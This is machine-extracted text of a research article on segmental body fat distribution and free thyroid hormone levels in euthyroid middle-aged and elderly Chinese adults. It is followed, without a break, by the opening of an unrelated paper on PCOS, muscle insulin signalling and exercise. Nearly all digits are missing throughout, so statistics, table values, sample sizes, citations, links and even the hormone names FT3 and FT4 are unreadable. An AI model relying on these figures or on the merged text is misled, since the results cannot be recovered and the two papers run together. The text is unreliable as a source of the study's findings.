https://ec.bioscientifica.com x nie, y xu and et al. fat distribution and thyroid hormones pb– : the reference range was related to the risk of nafld and multiple adverse metabolic and cardiovascular risk factors ( , , ), which suggests that a high level of ft within the reference range may be a potential adverse metabolic risk marker. the middle-aged and elderly population is at high risk of metabolic and cardiovascular disease; thus, it is meaningful to explore the associations between different fat depots and ft in this age group. bmi and waist circumference are simple indexes to evaluate obesity, but cannot be used to reflect the distribution of different fat depots. segmental fat depots (trunk, arm and leg) measured by segmental bioelectrical impedance analysis (sbia) are highly consistent with those measured by dual energy x-ray absorptiometry ( ). sbia can accurately evaluate body fat content with simple operation and lightweight size. none of the previous studies have focused on associations between segmental fat distribution and ft . in the present study, we aimed to explore the relationship between segmental fat distribution and ft in euthyroid middle-aged and elderly men and postmenopausal women. trunk fat and leg fat were found to have an inverse relationship with metabolic and cardiovascular disease in previous studies ( , , ). the relationship between arm fat and cardiovascular metabolic risk was nonsignificant or weak ( , ). thus, we calculated the leg fm to trunk fm ratio (ltr) to study the relationship between a tendency of fat to accumulate in the legs rather than trunk and ft . materials and methods study population men and postmenopausal women aged years or older were recruited from shanghai communities from october to july . postmenopausal status was defined as at least year of amenorrhea in the absence of other medical conditions ( ). the methods of population recruitment and data collection were described in our previous study ( ). all participants provided informed consent and received questionnaires, a physical examination, laboratory tests and segmental fat measurements. the exclusion criteria included a history of thyroid disease with thyroxine supplement or anti-thyroid therapy; abnormal thyroid function; a history of diabetes or cardiovascular disease; moderate-to-severe anemia; malignancy or an intracranial mass lesion; severe kidney or liver dysfunction; acute infection; hypoalbuminemia; taking lipid-lowering drugs, hypotensive drugs, weight-loss pills, glucocorticoids, sex hormones, amiodarone or lithium. the study was approved by the ethics committee of the shanghai jiao tong university affiliated sixth people’s hospital and was carried out following the guidelines of the declaration of helsinki. anthropometric and biochemical assessments height, body weight and blood pressure were measured according to standard methods, which were described in our previous study ( ). bmi was equal to the body weight (kg) divided by the height squared (m ). systolic blood pressure (sbp) and diastolic blood pressure (dbp) were determined by the mean blood pressure from three measurements taken at -min intervals. all subjects underwent a -g oral glucose tolerance test in the morning after an overnight fast of h. the measurements of fasting plasma glucose (fpg), -h plasma glucose ( h pg), glycated hemoglobin a c (hba c), fasting insulin (fins), triglyceride (tg), total cholesterol (tc), high-density lipoprotein cholesterol (hdl-c), and low-density lipoprotein cholesterol (ldl-c) were performed according to methods described in our previous study ( ). estradiol (e ) was detected by chemiluminescent microparticle immunoassays on an architect i sr analyzer (abbott gmbh & co. kg). the level of insulin resistance was evaluated by the homeostasis model assessment of insulin resistance (homa-ir) with the following formula: homa-ir = fins (mu/l) × fpg (mmol/l)/ . ( ). a cobas e analyzer (roche diagnostics gmbh) was used to measure ft , free thyroxine (ft ) and thyroid-stimulating hormone (tsh). the reference range and intra- and interassay coefficients for ft were . – . pmol/l, < . and < . %, respectively; for ft , they were . – . pmol/l, < . and < . %, respectively; and for tsh, they were . – . miu/l, < . and < . %, respectively. measurement of segmental fat distribution an automatic bioelectrical impedance analyzer (tbf- b; tanita corp., tokyo, japan) was used to measure total, trunk, arm and leg fat mass (fm) and fat percentage (fat%) according to a previously described method ( ). to evaluate the tendency of fat accumulation in the legs rather than the trunk, the ltr was calculated as leg fm (kg) divided by trunk fm (kg). this work is licensed under a creative commons attribution-noncommercial-noderivatives . international license. https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access https://creativecommons.org/licenses/by-nc-nd/ . / https://creativecommons.org/licenses/by-nc-nd/ . / https://creativecommons.org/licenses/by-nc-nd/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com x nie, y xu and et al. fat distribution and thyroid hormones : statistical analysis the normality of the distribution of variables was evaluated by the kolmogorov–smirnov test. normally distributed variables are expressed as the mean ± standard deviation. variables with a skewed distribution are expressed as the median (interquartile range). for normally distributed variables, one-way anova was used for trend analysis. for skewed variables, the kruskal–wallis h-test was used for trend analysis. partial correlation analysis was used to explore the age- and bmi-adjusted relationships between fat parameters and thyroid hormones. multivariate linear regression analysis was used to explore the relationship between segmental fat parameters and thyroid hormones. considering close correlations among segmental fat parameters, multicollinearity was analyzed for each linear regression model. a variance inflation factor > indicated serious multicollinearity. spss version . (spss, inc.) statistical software was used for all data analyses. a two- tailed p value < . was considered statistically significant. results clinical characteristics of the study participants the study included subjects with an age range of – years (mean age ± years). there were men and postmenopausal women. the medians of bmi, total fm and total fat% were . ( . – . ) kg/m , . ( . – . ) kg, and . ( . – . )%, respectively. the medians of ft , ft and tsh were . ( . – . ) pmol/l, . ( . – . ) pmol/l and . ( . – . ) miu/l, respectively. both men and women were divided into four groups according to ltr quartiles: q < . , q . – . , q . – . and q > . for men; and q < . , q . – . , q . – . and q > . for women (table ). in men, age, bmi, total fm, total fat%, dbp, fpg, fins, homa-ir and e decreased significantly with increasing ltr quartiles (all p for trend < . ). in women, bmi, total fm, total fat%, sbp, fpg, hba c, fins, homa-ir, tg and e decreased significantly with increasing ltr quartiles (all p for trend < . ). in both genders, hdl-c significantly increased with increasing ltr quartiles (all p for trend < . ). changes of thyroid hormones in ltr quartiles in men, ft , ft and tsh did not significantly change with increasing ltr quartiles (all p > . ). in women, only ft significantly decreased with increasing ltr quartiles. the medians of ft from the q to the q group of ltr quartiles were . ( . – . ) pmol/l, . ( . – . ) pmol/l, . ( . – . ) pmol/l and . ( . – . ) pmol/l (p for trend = . ). in women, ft and tsh did not change significantly with increasing ltr quartiles (all p > . , fig. ). partial correlation analysis of segmental fat parameters and thyroid hormones in men and women, trunk fm was . ( . – . ) kg and . ( . – . ) kg, trunk fat% was . ( . – . )% and . ( . – . )%, arm fm was . ( . – . ) kg and . ( . – . ) kg, arm fat% was . ( . – . )% and . ( . – . )%, leg fm was . ( . – . ) kg and . ( . – . ) kg, leg fat% was . ( . – . )% and . ( . – . )%, and the ltr was . ( . – . ) and . ( . – . ), respectively. age and bmi were adjusted in the partial correlation analysis. in men, none of the fat parameters were related to ft (all p > . ). in women, total fm (r = . , p = . ), total fat% (r = . , p = . ), trunk fm (r = . , p = . ) and trunk fat% (r = . , p = . ) were positively related to ft , while the ltr was negatively related to ft (r = − . , p = . ) (fig. ). in women, leg fm, leg fat%, arm fm and arm fat% were not related to ft (all p > . ). none of the segmental fat parameters were related to ft or tsh in both men and women (all p > . ). multivariate linear regression analysis for thyroid hormones multivariate linear regression analysis was used to explore the relationships between segmental fat parameters and thyroid hormones in women (table ). in model , age, homa-ir, dbp, ldl-c and e were adjusted. only ltr was negatively related to ft (standardized β = − . , p < . ), while total fat and other segmental fat parameters were not related to ft (all p > . ). none of the segmental fat parameters were related to ft or tsh (all p > . ). considering a significant and negative relationship between ltr and ft , trunk fat and leg fat might be confounding factors of one another. thus, we further created model . in model , all confounding factors involved in model were included. in addition, leg fm and trunk fm were mutually adjusted, and leg fat% and trunk fat% were mutually adjusted. trunk fm and trunk this work is licensed under a creative commons attribution-noncommercial-noderivatives . international license. https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access https://creativecommons.org/licenses/by-nc-nd/ . / https://creativecommons.org/licenses/by-nc-nd/ . / https://creativecommons.org/licenses/by-nc-nd/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com x nie, y xu and et al. fat distribution and thyroid hormones pb– : fat% were both positively related to ft (standardized β = . and . , respectively, all p < . ). leg fm and leg fat% were both negatively related to ft (standardized β = − . and − . , respectively, all p < . ). discussion in the present study, we found that trunk fat accumulation was related to increased ft in euthyroid postmenopausal women, while increased leg fat accumulation was related to decreased ft . these relationships were independent of multiple metabolic and cardiovascular risk factors. in men, none of the fat parameters were related to thyroid hormones. obesity is closely related to ft . previous studies have found that bmi and waist circumference were positively related to ft in the euthyroid population ( , ). a mendelian randomization study indicated that higher bmi or fm played a causal role in increasing ft levels ( ). simple obesity indexes, such as bmi have been widely used in these studies. there have been few studies of associations between precisely-measured fat distribution and ft . lambrinoudaki et  al. measured abdominal subcutaneous table  clinical characteristics of subjects. parameters ltr quartiles p for trendq q q q men  n –  age (years) ( – ) ( – ) ( – ) ( – ) .  bmi (kg/m ) . ( . – . ) . ( . – . ) . ( . – . ) . ( . – . ) < .  total fm (kg) . ( . – . ) . ( . – . ) . ( . – . ) . ( . – . ) < .  total fat% . ( . – . ) . ( . – . ) . ( . – . ) . ( . – . ) < .  sbp (mmhg) ( – ) ( – ) ( – ) ( – ) .  dbp (mmhg) ( – ) ( – ) ( – ) ( – ) .  fpg (mmol/l) . ( . – . ) . ( . – . ) . ( . – . ) . ( . – . ) .    h pg (mmol/l) . ( . – . ) . ( . – . ) . ( . – . ) . ( . – . ) .  hba c (%) . ( . – . ) . ( . – . ) . ( . – . ) . ( . – . ) .  fins (mu/l) . ( . – . ) . ( . – . ) . ( . – . ) . ( . – . ) .  homa-ir . ( . – . ) . ( . – . ) . ( . – . ) . ( . – . ) .  tc (mmol/l) .  ±  . .  ±  . .  ±  . .  ±  . .  tg (mmol/l) . ( . – . ) . ( . – . ) . ( . – . ) . ( . – . ) .  hdl-c (mmol/l) . ( . – . ) . ( . – . ) . ( . – . ) . ( . – . ) .  ldl-c (mmol/l) .  ±  . .  ±  . .  ±  . .  ±  . .  e (pmol/l) . ( . – . ) . ( . – . ) . ( . – . ) . ( . – . ) . women  n –  age (years) ( – ) ( – ) ( – ) ( – ) .  bmi (kg/m ) . ( . – . ) . ( . – . ) . ( . – . ) . ( . – . ) < .  total fm (kg) . ( . – . ) . ( . – . ) . ( . – . ) . ( . – . ) < .  total fat% . ( . – . ) . ( . – . ) . ( . – . ) . ( . – . ) < .  sbp (mmhg) ( – ) ( – ) ( – ) ( – ) .  dbp (mmhg) ( – ) ( – ) ( – ) ( – ) .  fpg (mmol/l) . ( . – . ) . ( . – . ) . ( . – . ) . ( . – . ) < .   hpg (mmol/l) . ( . – . ) . ( . – . ) . ( . – . ) . ( . – . ) .  hba c (%) . ( . – . ) . ( . – . ) . ( . – . ) . ( . – . ) .  fins (mu/l) . ( . – . ) . ( . – . ) . ( . – . ) . ( . – . ) < .  homa-ir . ( . – . ) . ( . – . ) . ( . – . ) . ( . – . ) < .  tc (mmol/l) .  ±  . .  ±  . .  ±  . .  ±  . .  tg (mmol/l) . ( . – . ) . ( . – . ) . ( . – . ) . ( . – . ) < .  hdl-c (mmol/l) . ( . – . ) . ( . – . ) . ( . – . ) . ( . – . ) < .  ldl-c (mmol/l) .  ±  . .  ±  . .  ±  . .  ±  . .  e (pmol/l) . ( . – . ) . ( . – . ) . ( . – . ) . ( . – . ) . data were means ± standard deviation or medians (interquartile range). q  <  . , q . – . , q . – . and q  >  . for men; q  <  . , q . – . , q . – . and q  >  . for women.  h pg, -h plasma glucose; bmi, body mass index; dbp, diastolic blood pressure; fat%, fat percentage; e , estradiol; fins, fasting insulin; fm, fat mass; fpg, fasting plasma glucose; hba c, glycated hemoglobin a c; hdl-c, high-density lipoprotein cholesterol; homa-ir, homeostasis model assessment- insulin resistance; ldl-c, low-density lipoprotein cholesterol; ltr, leg fat mass to trunk fat mass ratio; sbp, systolic blood pressure; tc, total cholesterol; tg, triglyceride. this work is licensed under a creative commons attribution-noncommercial-noderivatives . international license. https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access https://creativecommons.org/licenses/by-nc-nd/ . / https://creativecommons.org/licenses/by-nc-nd/ . / https://creativecommons.org/licenses/by-nc-nd/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com x nie, y xu and et al. fat distribution and thyroid hormones : fat and preperitoneal fat through ultrasonography in euthyroid postmenopausal women. they found that ft was positively associated with subcutaneous fat and preperitoneal fat ( ). sbia directly measures the bioelectrical impedance of the trunk, arms and legs. subsequently, fm and fat% of different fat depots can be calculated based on the bioelectrical impedance. the segmental fat distribution measured by sbia was highly consistent with that measured by dual energy x-ray absorptiometry (r ≥ . , p < . ) ( ). our findings in trunk fat were in consistent with lambrinoudaki`s results. however, we further found a significant and negative relationship between ft and leg fat, while arm fat was not related to thyroid hormones. moreover, our study found that there were no relationships between segmental fat distribution and thyroid hormones in men. in this study, the ltr was calculated to reflect a tendency of fat accumulating in the legs rather than the trunk. in one previous study, gavi et al. also calculated the limb fat to trunk fat ratio. limb fat specifically referred to leg fat in their study. they found that the limb fat to trunk fat ratio was negatively related to insulin resistance and tg and positively related to hdl-c in a middle-aged and elderly population ( ). the middle-aged and elderly population, especially postmenopausal women, is at high risk of metabolic and cardiovascular diseases ( ). in our study, we also chose this high-risk population as study subjects. we found that the ltr was negatively related to ft in postmenopausal women. the correlation coefficient of total fm related to ft was weaker than that of trunk fm related to ft in the partial correlation analysis, and a negative relationship was found between the ltr and ft . thus, we conjectured that leg fat and trunk fat might be confounding factors of one another. in the multivariate linear regression analysis, trunk fat and leg fat parameters were mutually adjusted. we found that trunk fat parameters were positively related to ft and that leg fat parameters were negatively related to ft . the result suggested that leg fat might alleviate the adverse effect between trunk fat and increased ft . a sex difference existed in the relationship between segmental fat distribution and ft in our study, which might because women had a greater propensity to store fat in the lower body driven by the effects of sex hormones ( , , ). figure  thyroid hormones with ltr quartiles. ft decreased significantly as ltr quartiles increased in women (p for trend =  . ), but this trend was not significant in men. ft and tsh were not significantly changed as ltr quartiles increased in both men and women. figure  partial correlation analysis of total fm, trunk fm, ltr and ft in women. age and bmi were adjusted. this work is licensed under a creative commons attribution-noncommercial-noderivatives . international license. https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access https://creativecommons.org/licenses/by-nc-nd/ . / https://creativecommons.org/licenses/by-nc-nd/ . / https://creativecommons.org/licenses/by-nc-nd/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com x nie, y xu and et al. fat distribution and thyroid hormones pb– : because ft promotes adipose decomposition and increases the basal metabolic rate ( ), a high level of ft in the obese population was considered a compensatory effect under the condition of energy surplus according to the conventional view ( ). however, in recent years, some studies found that a high level of ft within the reference range is related to an increased risk of nafld ( , ). in the lifelines cohort study, the risk of nafld increased . -fold for each standard deviation increase in ft in the euthyroid population ( ). in a euthyroid chinese population, a high level of ft was an independent predictive factor of nafld ( ). roef et al. found that ft was positively related to multiple adverse metabolic and cardiovascular risk factors in a euthyroid middle-aged population ( ). although there is still a lack of evidence from prospective studies, a high level of ft within the reference range may be a potential adverse metabolic marker. trunk fat and leg fat have exhibited inverse relationships with type diabetes, cardiovascular disease and multiple metabolic and cardiovascular risk factors ( , , , , ). there are large discrepancies between trunk fat and leg fat in the uptake and release of free fatty acids ( ). trunk fat is more sensitive to lipolysis stimulus. leg fat has a lower lipolysis rate and is the ‘storage pool’ of circulating ectopic lipids. leg fat can stabilize free fatty acids that are released by trunk fat and thus decrease lipotoxicity ( ). trunk fat and leg fat also differ in the release of adipokines and inflammatory factors ( , , ); however, few studies have explored the relationships between adipokines and ft . further research is needed to clarify the mechanisms underlying the correlations between trunk fat, leg fat and ft . our study has some limitations. first, the study subjects were middle-aged and elderly; thus, the results may not be generalizable to other age groups. second, the present study did not fully consider some information such as luteinizing hormone, follicle- stimulating hormone and selective estrogen receptor modulators. third, due to the nature of the cross-sectional study, causality cannot be deduced. further prospective studies are needed to elucidate the causal relationship between segmental fat distribution and ft . conclusions in euthyroid postmenopausal women, trunk fat is positively related to ft , while leg fat is negatively related to ft . our findings supported that a high level of ft within the reference range was related to adverse fat distribution. further studies are needed to clarify the causality and underlying mechanisms. declaration of interest the authors declare that there is no conflict of interest that could be perceived as prejudicing the impartiality of the research reported. table  multivariate linear regression for thyroid hormones in women. independent variables ft ft tsh model  total fat mass . ( . ) . ( . ) − . (− . ) fat% . ( . ) − . (− . ) − . (− . )  trunk fat mass . ( . ) . ( . ) − . (− . ) fat% . ( . ) − . (− . ) − . (− . )  arm fat mass − . (− . ) . ( . ) − . (− . ) fat% . ( . ) − . (− . ) − . (− . )  leg fat mass − . (− . ) . ( . ) − . (− . ) fat% − . (− . ) − . (− . ) − . (− . )  leg fat mass to trunk fat mass ratio − . (− . )a − . (− . ) . ( . ) model  trunk fat mass . ( . )b . ( . ) − . (− . ) fat% . ( . )a . ( . ) − . (− . )  leg fat mass − . (− . )a − . (− . ) . ( . ) fat% − . (− . )a − . (− . ) . ( . ) data were expressed as standardized β (t). ap <  . , bp <  . . model was adjusted for age, homeostasis model assessment-insulin resistance, diastolic blood pressure, low-density lipoprotein cholesterol and estradiol. in model , all confounding factors included in model were adjusted, in addition that trunk fat mass was adjusted for leg fat mass, trunk fat% was adjusted for leg fat%, leg fat mass was adjusted for trunk fat mass, leg fat% was adjusted for trunk fat%. fat%, fat percentage; ft , free triiodothyronine; ft , free thyroxine; tsh, thyroid-stimulating hormone. this work is licensed under a creative commons attribution-noncommercial-noderivatives . international license. https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access https://creativecommons.org/licenses/by-nc-nd/ . / https://creativecommons.org/licenses/by-nc-nd/ . / https://creativecommons.org/licenses/by-nc-nd/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com x nie, y xu and et al. fat distribution and thyroid hormones : funding this work was supported by the national key r&d program of china ( yfa ). references dale ce, fatemifar g, palmer tm, white j, prieto-merino d, zabaneh d, engmann jel, shah t, wong a, warren hr, et al. causal associations of adiposity and body fat distribution with coronary heart disease, stroke subtypes, and type diabetes mellitus: a mendelian randomization analysis. circulation – . (https://doi.org/ . /circulationaha. . ) emdin ca, khera av, natarajan p, klarin d, zekavat sm, hsiao aj & kathiresan s. genetic association of waist-to-hip ratio with cardiometabolic traits, type diabetes, and coronary heart disease. jama – . (https://doi.org/ . /jama. . ) vasan sk, osmond c, canoy d, christodoulides c, neville mj, di gravio c, fall chd & karpe f. comparison of regional fat measurements by dual-energy x-ray absorptiometry and conventional anthropometry and their association with markers of diabetes and cardiovascular disease risk. international journal of obesity – . (https://doi.org/ . /ijo. . ) mullur r, liu yy & brent ga. thyroid hormone regulation of metabolism. physiological reviews – . (https://doi. org/ . /physrev. . ) roef gl, rietzschel er, van daele cm, taes ye, de buyzere ml, gillebert tc & kaufman jm. triiodothyronine and free thyroxine levels are differentially associated with metabolic profile and adiposity-related cardiovascular risk markers in euthyroid middle- aged subjects. thyroid – . (https://doi.org/ . / thy. . ) de pergola g, ciampolillo a, paolotti s, trerotoli p & giorgino r. free triiodothyronine and thyroid stimulating hormone are directly associated with waist circumference, independently of insulin resistance, metabolic parameters and blood pressure in overweight and obese women. clinical endocrinology – . (https:// doi.org/ . /j. - . . .x) van den berg eh, van tienhoven-wind lj, amini m, schreuder tc, faber kn, blokzijl h & dullaart rp. higher free triiodothyronine is associated with non-alcoholic fatty liver disease in euthyroid subjects: the lifelines cohort study. metabolism: clinical and experimental – . (https://doi.org/ . /j. metabol. . . ) liu g, zheng x, guan l, jiang z, lin h, jiang q, zhang n, zhang y, zhang x, yu c, et al. free triiodothyronine levels are positively associated with non-alcoholic fatty liver disease in euthyroid middle- aged subjects. endocrine research – . (https://doi.org/ . / . . ) pietrobelli a, rubiano f, st-onge mp & heymsfield sb. new bioimpedance analysis system: improved phenotyping with whole-body analysis. european journal of clinical nutrition – . (https://doi.org/ . /sj.ejcn. ) snijder mb, dekker jm, visser m, bouter lm, stehouwer cd, yudkin js, heine rj, nijpels g, seidell jc & hoorn study. trunk fat and leg fat have independent and opposite associations with fasting and postload glucose levels: the hoorn study. diabetes care – . (https://doi.org/ . /diacare. . . ) wu h, qi q, yu z, sun q, wang j, franco oh, sun l, li h, liu y, hu fb, et al. independent and opposite associations of trunk and leg fat depots with adipokines, inflammatory markers, and metabolic syndrome in middle-aged and older chinese men and women. journal of clinical endocrinology & metabolism – . (https://doi.org/ . /jc. - ) sanchez-lopez m, ortega fb, moya-martinez p, lopez-martinez s, ortiz-galeano i, gomez-marcos ma, sjostrom m & martinez- vizcaino v. leg fat might be more protective than arm fat in relation to lipid profile. european journal of nutrition – . (https://doi.org/ . /s - - - ) hu g, bouchard c, bray ga, greenway fl, johnson wd, newton rl, jr, ravussin e, ryan dh & katzmarzyk pt. trunk versus extremity adiposity and cardiometabolic risk factors in white and african american adults. diabetes care – . (https://doi. org/ . /dc - ) national collaborating centre for women’s and children’s health. menopause: full guideline. clinical guideline: methods, evidence and recommendations. london, uk: national institute for health and care excellence (uk), . (available at: https://www.nice.org.uk/ guidance/ng /evidence/full-guideline- ) xu y, ma x, shen y, gu c, tang j & bao y. role of hyperglycaemia in the relationship between serum osteocalcin levels and relative skeletal muscle index. clinical nutrition [epub]. (https://doi. org/ . /j.clnu. . . ) matthews dr, hosker jp, rudenski as, naylor ba, treacher df & turner rc. homeostasis model assessment: insulin resistance and beta-cell function from fasting plasma glucose and insulin concentrations in man. diabetologia – . (https://doi. org/ . /bf ) taylor pn, richmond r, davies n, sayers a, stevenson k, woltersdorf w, taylor a, groom a, northstone k, ring s, et al. paradoxical relationship between body mass index and thyroid hormone levels: a study using mendelian randomization. journal of clinical endocrinology & metabolism – . (https://doi. org/ . /jc. - ) lambrinoudaki i, armeni e, rizos d, georgiopoulos g, athanasouli f, triantafyllou n, panoulis k, augoulea a, creatsa m, alexandrou a, et al. indices of adiposity and thyroid hormones in euthyroid postmenopausal women. european journal of endocrinology – . (https://doi.org/ . /eje- - ) gavi s, feiner jj, melendez mm, mynarcik dc, gelato mc & mcnurlan ma. limb fat to trunk fat ratio in elderly persons is a strong determinant of insulin resistance and adiponectin levels. journals of gerontology. series a, biological sciences and medical sciences – . (https://doi.org/ . / gerona/ . . ) auro k, joensuu a, fischer k, kettunen j, salo p, mattsson h, niironen m, kaprio j, eriksson jg, lehtimaki t, et al. a metabolic view on menopause and ageing. nature communications . (https://doi.org/ . /ncomms ) tchkonia t, thomou t, zhu y, karagiannides i, pothoulakis c, jensen md & kirkland jl. mechanisms and metabolic implications of regional differences among fat depots. cell metabolism – . (https://doi.org/ . /j.cmet. . . ) koutsari c, ali ah, mundi ms & jensen md. storage of circulating free fatty acid in adipose tissue of postabsorptive humans: quantitative measures and implications for body fat distribution. diabetes – . (https://doi. org/ . /db - ) rask-andersen m, karlsson t, ek we & johansson Å. genome-wide association study of body fat distribution identifies adiposity loci and sex-specific genetic effects. nature communications . (https://doi.org/ . /s - - - ) yano y, vongpatanasin w, ayers c, turer a, chandra a, carnethon mr, greenland p, de lemos ja & neeland ij. regional fat distribution and blood pressure level and variability: the dallas heart study. hypertension – . (https://doi.org/ . / hypertensionaha. . ) lee m, choh ac, demerath ew, towne b, siervogel rm & czerwinski sa. associations between trunk, leg and total body this work is licensed under a creative commons attribution-noncommercial-noderivatives . international license. https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access https://doi.org/ . /circulationaha. . https://doi.org/ . /jama. . https://doi.org/ . /ijo. . https://doi.org/ . /physrev. . https://doi.org/ . /physrev. . https://doi.org/ . /thy. . https://doi.org/ . /thy. . https://doi.org/ . /j. - . . .x https://doi.org/ . /j. - . . .x https://doi.org/ . /j.metabol. . . https://doi.org/ . /j.metabol. . . https://doi.org/ . / . . https://doi.org/ . / . . https://doi.org/ . /sj.ejcn. https://doi.org/ . /diacare. . . https://doi.org/ . /jc. - https://doi.org/ . /s - - - https://doi.org/ . /dc - https://doi.org/ . /dc - https://www.nice.org.uk/guidance/ng /evidence/full-guideline- https://www.nice.org.uk/guidance/ng /evidence/full-guideline- https://doi.org/ . /j.clnu. . . https://doi.org/ . /j.clnu. . . https://doi.org/ . /bf https://doi.org/ . /bf https://doi.org/ . /jc. - https://doi.org/ . /jc. - https://doi.org/ . /eje- - https://doi.org/ . /gerona/ . . https://doi.org/ . /gerona/ . . https://doi.org/ . /ncomms https://doi.org/ . /j.cmet. . . https://doi.org/ . /db - https://doi.org/ . /db - https://doi.org/ . /s - - - https://doi.org/ . /hypertensionaha. . https://doi.org/ . /hypertensionaha. . https://creativecommons.org/licenses/by-nc-nd/ . / https://creativecommons.org/licenses/by-nc-nd/ . / https://creativecommons.org/licenses/by-nc-nd/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com x nie, y xu and et al. fat distribution and thyroid hormones pb– : adiposity with arterial stiffness. american journal of hypertension – . (https://doi.org/ . /ajh. . ) ebbert jo & jensen md. fat depots, free fatty acids, and dyslipidemia. nutrients – . (https://doi.org/ . /nu ) pinnick ke, neville mj, fielding ba, frayn kn, karpe f & hodson l. gluteofemoral adipose tissue plays a major role in production of the lipokine palmitoleate in humans. diabetes – . (https://doi.org/ . /db - ) antony b, jones g, stannus o, blizzard l & ding c. body fat predicts an increase and limb muscle strength predicts a decrease in leptin in older adults over . years. clinical endocrinology – . (https://doi.org/ . /cen. ) received in final form september accepted september accepted preprint published online september this work is licensed under a creative commons attribution-noncommercial-noderivatives . international license. https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access https://doi.org/ . /ajh. . https://doi.org/ . /nu https://doi.org/ . /db - https://doi.org/ . /cen. https://creativecommons.org/licenses/by-nc-nd/ . / https://creativecommons.org/licenses/by-nc-nd/ . / https://creativecommons.org/licenses/by-nc-nd/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com abstract introduction materials and methods study population anthropometric and biochemical assessments measurement of segmental fat distribution statistical analysis results clinical characteristics of the study participants changes of thyroid hormones in ltr quartiles partial correlation analysis of segmental fat parameters and thyroid hormones multivariate linear regression analysis for thyroid hormones discussion conclusions declaration of interest funding references : – n k stepto, d hiam et al. insulin resistance in pcos skeletal muscle research exercise and insulin resistance in pcos: muscle insulin signalling and fibrosis n k stepto , , , ,*, d hiam ,*, m gibson-helm , s cassar , c l harrison , s k hutchison , a e joham , b j canny , a moreno-asso , , b j strauss , , n hatzirodos , r j rodgers and h j teede , institute for health and sport, victoria university, melbourne, victoria, australia monash centre for health research and implementation, monash university, clayton, victoria, australia australian institute for musculoskeletal science, victoria university, melbourne, victoria, australia medicine-western health, faculty of medicine, dentistry and health science, melbourne university, melbourne, victoria, australia school of medicine, university of tasmania, hobart, tasmania, australia department of medicine, school of clinical sciences, monash university, clayton, victoria, australia division of diabetes, endocrinology & gastroenterology, school of medical sciences, faculty of biology, medicine and health, the university of manchester, manchester, uk the robinson research institute, school of medicine, the university of adelaide, adelaide, australia diabetes and endocrine units, monash health, clayton, victoria, australia correspondence should be addressed to d hiam: danielle.hiam@vu.edu.au *(n k stepto and d hiam contributed equally to this work) abstract objective: mechanisms of insulin resistance in polycystic ovary syndrome (pcos) remain ill defined, contributing to sub-optimal therapies. recognising skeletal muscle plays a key role in glucose homeostasis we investigated early insulin signalling, its association with aberrant transforming growth factor β (tgfβ)-regulated tissue fibrosis. we also explored the impact of aerobic exercise on these molecular pathways. methods: a secondary analysis from a cross-sectional study was undertaken in women with (n =  ) or without (n =  ) pcos across lean and overweight bmis. a subset of participants with (n =  ) or without (n =  ) pcos who were overweight completed weeks of aerobic exercise training. muscle was sampled before and min into a euglycaemic-hyperinsulinaemic clamp pre and post training. results: we found reduced signalling in pcos of mechanistic target of rapamycin (mtor). exercise training augmented but did not completely rescue this signalling defect in women with pcos. genes in the tgfβ signalling network were upregulated in skeletal muscle in the overweight women with pcos but were unresponsive to exercise training except for genes encoding lox, collagen and . conclusions: we provide new insights into defects in early insulin signalling, tissue fibrosis, and hyperandrogenism in pcos-specific insulin resistance in lean and overweight women. pcos-specific insulin signalling defects were isolated to mtor, while gene expression implicated tgfβ ligand regulating a fibrosis in the pcos-obesity synergy in insulin resistance and altered responses to exercise. interestingly, there was little evidence for hyperandrogenism as a mechanism for insulin resistance. - - key words f mechanistic target of rapamysin (mtor) f typical and atypical protein kinase c f transforming growth factor β receptor (tgfbrii) f collagen f treadmill exercise training f high intensity interval training f hyperandrogenism endocrine connections ( ) , – id: - this work is licensed under a creative commons attribution-noncommercial . international license.https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access mailto:danielle.hiam@vu.edu.au https://creativecommons.org/licenses/by-nc/ . / https://creativecommons.org/licenses/by-nc/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com n k stepto, d hiam et al. insulin resistance in pcos skeletal muscle pb–xx : introduction polycystic ovary syndrome (pcos) affects – % of women of reproductive age ( ) has major metabolic (increased type diabetes mellitus (t d) and cardiovascular risk factors) ( , , ), reproductive (leading cause of anovulatory infertility) ( , ) and psychological (anxiety and depression) ( ) impacts, representing a substantial health burden. despite its high prevalence, the aetiology and ideal therapies for pcos remain unclear ( ). insulin resistance is a central characteristic ( , ), driving both hyperandrogenism and clinical features. the risk of t d in pcos is increased . -fold independent of bmi ( , , ) accounting for % of t d in young women ( ); yet, the underlying mechanisms of insulin resistance in pcos remain ill defined ( , ). therapeutic strategies in pcos include medical therapy (metformin) and weight management via diet and exercise ( , , ), which reduce but not reverse insulin resistance and fail to optimally treat pcos. in this context, greater insight into aetiology of insulin resistance in pcos is needed. based on euglycaemic-hyperinsulinaemic clamp data, prevalence of insulin resistance has been reported in up to % of women with pcos as diagnosed by rotterdam criteria ( ). pcos has a unique pcos- related insulin resistance (intrinsic insulin resistance) as % of lean pcos are insulin resistant, compared to lean women without pcos. this insulin resistance is exacerbated by obesity (extrinsic insulin resistance ( , , )). intrinsic insulin resistance in pcos is likely due to a dysfunctional response to insulin in metabolically active peripheral tissues including adipose tissue and skeletal muscle ( , ). as skeletal muscle accounts for – % of insulin-stimulated glucose uptake ( ) defects may have profound effects on whole body insulin sensitivity. reduced insulin sensitivity in skeletal muscle has well-established mechanisms including defective 